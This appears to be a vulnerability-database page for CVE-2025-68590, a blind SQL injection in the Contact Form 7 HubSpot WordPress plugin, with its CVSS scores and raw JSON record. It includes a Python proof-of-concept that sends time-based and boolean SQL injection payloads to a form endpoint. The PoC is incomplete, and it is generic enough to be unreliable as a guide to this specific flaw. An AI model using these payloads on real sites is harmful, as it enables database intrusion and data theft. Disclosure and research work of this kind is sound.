Security Vulnerability Report
中文
CVE-2025-68590 CVSS 7.6 HIGH

CVE-2025-68590

Published: 2025-12-24 13:16:26
Last Modified: 2026-04-27 19:16:35

Description

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in CRM Perks Integration for Contact Form 7 HubSpot cf7-hubspot allows Blind SQL Injection.This issue affects Integration for Contact Form 7 HubSpot: from n/a through <= 1.4.2.

CVSS Details

CVSS Score
7.6
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:L

Configurations (Affected Products)

No configuration data available.

Integration for Contact Form 7 HubSpot <= 1.4.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import time # CVE-2025-68590 Blind SQL Injection PoC # Target: WordPress site with cf7-hubspot plugin <= 1.4.2 target_url = "http://target-site.com/wp-json/contact-form-7/v1/contact-forms/[FORM_ID]/feedback" # Basic authentication bypass payload (example) payload = { "_wpcf7": "[FORM_ID]", "your-name": "test', (SELECT CASE WHEN (1=1) THEN SLEEP(5) ELSE 0 END))-- -", "your-email": "[email protected]", "your-message": "Test message" } # Boolean-based blind SQL injection def test_blind_sql_injection(url, payload_template): # Test if vulnerability exists by checking response time start_time = time.time() response = requests.post(url, data=payload_template, timeout=10) elapsed = time.time() - start_time # If response takes > 5 seconds, vulnerability likely exists if elapsed > 5: print("[+] Blind SQL Injection vulnerability confirmed!") return True return False # Database enumeration example def extract_database_version(url): # Extract MySQL version using blind injection payload = { "_wpcf7": "[FORM_ID]", "your-name": f"test' AND (SELECT SUBSTRING(@@version,1,1)='5')-- -", "your-email": "[email protected]", "your-message": "Test" } # Check response to determine version character pass print("CVE-2025-68590 PoC - Use responsibly and only with authorization")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68590", "sourceIdentifier": "[email protected]", "published": "2025-12-24T13:16:26.337", "lastModified": "2026-04-27T19:16:34.543", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in CRM Perks Integration for Contact Form 7 HubSpot cf7-hubspot allows Blind SQL Injection.This issue affects Integration for Contact Form 7 HubSpot: from n/a through <= 1.4.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:L", "baseScore": 7.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/cf7-hubspot/vulnerability/wordpress-integration-for-contact-form-7-hubspot-plugin-1-4-2-sql-injection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}